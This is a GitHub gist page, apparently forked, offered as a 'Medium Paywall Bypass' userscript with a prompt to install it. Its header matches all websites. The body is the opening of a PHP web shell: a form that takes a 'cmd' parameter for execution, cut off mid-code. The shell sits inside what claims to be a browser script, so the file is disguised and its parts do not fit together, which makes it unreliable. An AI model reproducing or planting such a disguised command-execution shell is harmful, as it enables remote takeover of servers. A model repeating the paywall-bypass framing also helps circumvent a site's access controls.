Skip to content

Instantly share code, notes, and snippets.

View ArduinoAficionado's full-sized avatar
💫
TRUTH LIFE BEAUTY

Arduino Aficionado ArduinoAficionado

💫
TRUTH LIFE BEAUTY
View GitHub Profile
@ArduinoAficionado
ArduinoAficionado / medium.user.js
Created October 5, 2025 04:09 — forked from mathix420/medium.user.js
Bypass Medium Paywall - Working late 2023 - Greasy Fork, Violentmonkey, Tampermonkey - Click the RAW button to install
// ==UserScript==
// @name Medium Paywall Bypass
// @namespace Violentmonkey Scripts
// @run-at document-start
// @match *://*.medium.com/*
// @match *://medium.com/*
// @match *://*/*
// @grant none
// @version 2.4
// @inject-into content
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{